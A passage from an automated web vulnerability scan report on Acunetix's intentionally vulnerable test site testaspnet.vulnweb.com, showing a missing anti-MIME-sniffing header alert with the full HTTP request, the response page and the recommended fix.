          The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'. This allows older versions of Internet Explorer and Chrome to perform MIME-sniffing on the response body, potentially causing the response body to be interpreted and displayed as a content type other than the declared content type. Current (early 2014) and legacy versions of Firefox will use the declared content type (if one is set), rather than performing MIME-sniffing.

          Other info

          This issue still applies to error type pages (401, 403, 500, etc.) as those pages are often still affected by injection issues, in which case there is still concern for browsers sniffing pages away from their actual content type.

          At "High" threshold this scan rule will not alert on client or server error responses.

          Request
          Request line and header section (413 bytes)
          POST http://testaspnet.vulnweb.com/ReadNews.aspx?id=3 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Content-Type: application/x-www-form-urlencoded
          Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?id=3
          Content-Length: 3745
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (3745 bytes)
          __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNzozNSBBTWQCBQ8WAh8BBTFBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIGJldGEgcmVsZWFzZWQhZAIHDxYCHwEFnA48cD5EdXJpbmcgdGhlIGJldGEgcGhhc2UsIGJ1aWxkcyBhcmUgcmVsZWFzZWQgZnJlcXVlbnRseSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhlcmVmb3JlIGl0IGlzIG5vdCByZWNvbW1lbmRlZCB0aGF0IHRoZSBzYW1lIGJldGEgdmVyc2lvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICBpcyB1c2VkIGZvciBtb3JlIHRoYW4gMzAgZGF5cy4gVG8gYmV0YS10ZXN0IGJleW9uZCAzMCAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYXlzLCB1c2VycyBzaG91bGQgaW5zdGFsbCB0aGUgbGF0ZXN0IGJldGEgdmVyc2lvbiBvciwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYgYXZhaWxhYmxlLCB1c2UgdGhlIHJlbGVhc2UgdmVyc2lvbi48L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5BYm91dCBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciwgYSB1bmlxdWUgd2ViIGFwcGxpY2F0aW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNjYW5uaW5nIHByb2R1Y3QgdGhhdCBtYWtlcyBzZWN1cmluZyBvbmUmcnNxdW87cyB3ZWJzaXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVhc2llciB0aGFuIGV2ZXIuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaXMgYW4gYXV0b21hdGVkIHdlYiBhcHBsaWNhdGlvbiBzZWN1cml0eSB0ZXN0aW5nIHRvb2wgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUgYW5kIGF0dGFja3MgaXQgc28gYXMgdG8gICAgICAgICAgICAgICAgICAgICAgICAgICAgaWRlbnRpZnkgcG90ZW50aWFsIHdlYWtuZXNzZXMgYmVmb3JlIGhhY2tlcnMgZG8uIEZ1cnRoZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW5mb3JtYXRpb24gaXMgYXZhaWxhYmxlIDxhIGhyZWY9aHR0cHM6Ly93d3cuYWN1bmV0aXguY29tL3Z1bG5lcmFiaWxpdHktc2Nhbm5lci8%2BaGVyZTwvYT4uPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc%2BQWJvdXQgQWN1bmV0aXg8L3N0cm9uZz48L3A%2BICAgICA8cD5Vc2VyLWZyaWVuZGx5IGFuZCBjb21wZXRpdGl2ZWx5IHByaWNlZCwgQWN1bmV0aXggbGVhZHMgdGhlIG1hcmtldCBpbiBhdXRvbWF0aWMgd2ViIHNlY3VyaXR5IHRlc3RpbmcgdGVjaG5vbG9neS4gSXRzIGluZHVzdHJ5LWxlYWRpbmcgY3Jhd2xlciBmdWxseSBzdXBwb3J0cyBIVE1MNSwgSmF2YVNjcmlwdCwgYW5kIEFKQVgtaGVhdnkgd2Vic2l0ZXMsIGVuYWJsaW5nIHRoZSBhdWRpdGluZyBvZiBjb21wbGV4LCBhdXRoZW50aWNhdGVkIGFwcGxpY2F0aW9ucy4gQWN1bmV0aXggcHJvdmlkZXMgdGhlIG9ubHkgdGVjaG5vbG9neSBvbiB0aGUgbWFya2V0IHRoYXQgY2FuIGF1dG9tYXRpY2FsbHkgZGV0ZWN0IG91dC1vZi1iYW5kIHZ1bG5lcmFiaWxpdGllcyBhbmQgaXMgYXZhaWxhYmxlIGJvdGggYXMgYW4gb25saW5lIGFuZCBvbi1wcmVtaXNlcyBzb2x1dGlvbi4gQWN1bmV0aXggYWxzbyBpbmNsdWRlcyBpbnRlZ3JhdGVkIHZ1bG5lcmFiaWxpdHkgbWFuYWdlbWVudCBmZWF0dXJlcyB0byBleHRlbmQgdGhlIGVudGVycHJpc2UmcnNxdW87cyBhYmlsaXR5IHRvIGNvbXByZWhlbnNpdmVseSBtYW5hZ2UsIHByaW9yaXRpemUsIGFuZCBjb250cm9sIHZ1bG5lcmFiaWxpdHkgdGhyZWF0cyAmbmRhc2g7IG9yZGVyZWQgYnkgYnVzaW5lc3MgY3JpdGljYWxpdHkuPC9wPmQCCQ8PFgIeC05hdmlnYXRlVXJsBRJDb21tZW50cy5hc3B4P2lkPTNkZAILDxYCHgNzcmNkZGTLo6VVRRdQACEbfKXC37R1sHPpoA%3D%3D&__VIEWSTATEGENERATOR=532053C5&__EVENTVALIDATION=%2FwEWVwK30rH2AgK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ9jwc%2FcRnTJwdNTwN8SPSTaigKqpw%3D%3D
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:21 GMT
          Content-Length: 17859
          
          
          Response body (17859 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?id=3" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNzozNSBBTWQCBQ8WAh8BBTFBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIGJldGEgcmVsZWFzZWQhZAIHDxYCHwEFnA48cD5EdXJpbmcgdGhlIGJldGEgcGhhc2UsIGJ1aWxkcyBhcmUgcmVsZWFzZWQgZnJlcXVlbnRseSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhlcmVmb3JlIGl0IGlzIG5vdCByZWNvbW1lbmRlZCB0aGF0IHRoZSBzYW1lIGJldGEgdmVyc2lvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICBpcyB1c2VkIGZvciBtb3JlIHRoYW4gMzAgZGF5cy4gVG8gYmV0YS10ZXN0IGJleW9uZCAzMCAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYXlzLCB1c2VycyBzaG91bGQgaW5zdGFsbCB0aGUgbGF0ZXN0IGJldGEgdmVyc2lvbiBvciwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYgYXZhaWxhYmxlLCB1c2UgdGhlIHJlbGVhc2UgdmVyc2lvbi48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BYm91dCBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciwgYSB1bmlxdWUgd2ViIGFwcGxpY2F0aW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNjYW5uaW5nIHByb2R1Y3QgdGhhdCBtYWtlcyBzZWN1cmluZyBvbmUmcnNxdW87cyB3ZWJzaXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVhc2llciB0aGFuIGV2ZXIuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaXMgYW4gYXV0b21hdGVkIHdlYiBhcHBsaWNhdGlvbiBzZWN1cml0eSB0ZXN0aW5nIHRvb2wgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUgYW5kIGF0dGFja3MgaXQgc28gYXMgdG8gICAgICAgICAgICAgICAgICAgICAgICAgICAgaWRlbnRpZnkgcG90ZW50aWFsIHdlYWtuZXNzZXMgYmVmb3JlIGhhY2tlcnMgZG8uIEZ1cnRoZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW5mb3JtYXRpb24gaXMgYXZhaWxhYmxlIDxhIGhyZWY9aHR0cHM6Ly93d3cuYWN1bmV0aXguY29tL3Z1bG5lcmFiaWxpdHktc2Nhbm5lci8+aGVyZTwvYT4uPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+QWJvdXQgQWN1bmV0aXg8L3N0cm9uZz48L3A+ICAgICA8cD5Vc2VyLWZyaWVuZGx5IGFuZCBjb21wZXRpdGl2ZWx5IHByaWNlZCwgQWN1bmV0aXggbGVhZHMgdGhlIG1hcmtldCBpbiBhdXRvbWF0aWMgd2ViIHNlY3VyaXR5IHRlc3RpbmcgdGVjaG5vbG9neS4gSXRzIGluZHVzdHJ5LWxlYWRpbmcgY3Jhd2xlciBmdWxseSBzdXBwb3J0cyBIVE1MNSwgSmF2YVNjcmlwdCwgYW5kIEFKQVgtaGVhdnkgd2Vic2l0ZXMsIGVuYWJsaW5nIHRoZSBhdWRpdGluZyBvZiBjb21wbGV4LCBhdXRoZW50aWNhdGVkIGFwcGxpY2F0aW9ucy4gQWN1bmV0aXggcHJvdmlkZXMgdGhlIG9ubHkgdGVjaG5vbG9neSBvbiB0aGUgbWFya2V0IHRoYXQgY2FuIGF1dG9tYXRpY2FsbHkgZGV0ZWN0IG91dC1vZi1iYW5kIHZ1bG5lcmFiaWxpdGllcyBhbmQgaXMgYXZhaWxhYmxlIGJvdGggYXMgYW4gb25saW5lIGFuZCBvbi1wcmVtaXNlcyBzb2x1dGlvbi4gQWN1bmV0aXggYWxzbyBpbmNsdWRlcyBpbnRlZ3JhdGVkIHZ1bG5lcmFiaWxpdHkgbWFuYWdlbWVudCBmZWF0dXJlcyB0byBleHRlbmQgdGhlIGVudGVycHJpc2UmcnNxdW87cyBhYmlsaXR5IHRvIGNvbXByZWhlbnNpdmVseSBtYW5hZ2UsIHByaW9yaXRpemUsIGFuZCBjb250cm9sIHZ1bG5lcmFiaWxpdHkgdGhyZWF0cyAmbmRhc2g7IG9yZGVyZWQgYnkgYnVzaW5lc3MgY3JpdGljYWxpdHkuPC9wPmQCCQ8PFgQeBFRleHQFElJlYWQgdXNlciBjb21tZW50cx4LTmF2aWdhdGVVcmwFEkNvbW1lbnRzLmFzcHg/aWQ9M2RkAgsPFgIeA3NyY2RkZNGFyTb9L/R3K+NgG4eTH6G64d5v" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKblqunCgK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q8M7PLE5RqS1nNbgt2x8WWJp0h2GA==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>11/8/2005 11:37:35 AM</DIV>
          						<DIV id="divNewsTitle" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</DIV>
          						<DIV id="divNewsLong" class="NewsLong"><p>During the beta phase, builds are released frequently,                            therefore it is not recommended that the same beta version                            is used for more than 30 days. To beta-test beyond 30                            days, users should install the latest beta version or,                            if available, use the release version.</p>                           <p><strong>About Acunetix Web Vulnerability Scanner</strong><br />                           Acunetix Web Vulnerability Scanner, a unique web application                            scanning product that makes securing one&rsquo;s website                            easier than ever. Acunetix Web Vulnerability Scanner                            is an automated web application security testing tool                            that crawls an entire website and attacks it so as to                            identify potential weaknesses before hackers do. Further                            information is available <a href=https://www.acunetix.com/vulnerability-scanner/>here</a>.</p>                           <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=3">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Parameter
          X-Content-Type-Options
          Solution

          Ensure that the application/web server sets the Content-Type header appropriately, and that it sets the X-Content-Type-Options header to 'nosniff' for all web pages.

          If possible, ensure that the end user uses a standards-compliant and modern web browser that does not perform MIME-sniffing at all, or that can be directed by the web application/web server to not perform MIME-sniffing.

        31. POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=0
          Alert tags
          Alert description

          The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'. This allows older versions of Internet Explorer and Chrome to perform MIME-sniffing on the response body, potentially causing the response body to be interpreted and displayed as a content type other than the declared content type. Current (early 2014) and legacy versions of Firefox will use the declared content type (if one is set), rather than performing MIME-sniffing.

          Other info

          This issue still applies to error type pages (401, 403, 500, etc.) as those pages are often still affected by injection issues, in which case there is still concern for browsers sniffing pages away from their actual content type.

          At "High" threshold this scan rule will not alert on client or server error responses.

          Request
          Request line and header section (455 bytes)
          POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=0 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Content-Type: application/x-www-form-urlencoded
          Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=0
          Content-Length: 6567
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (6567 bytes)
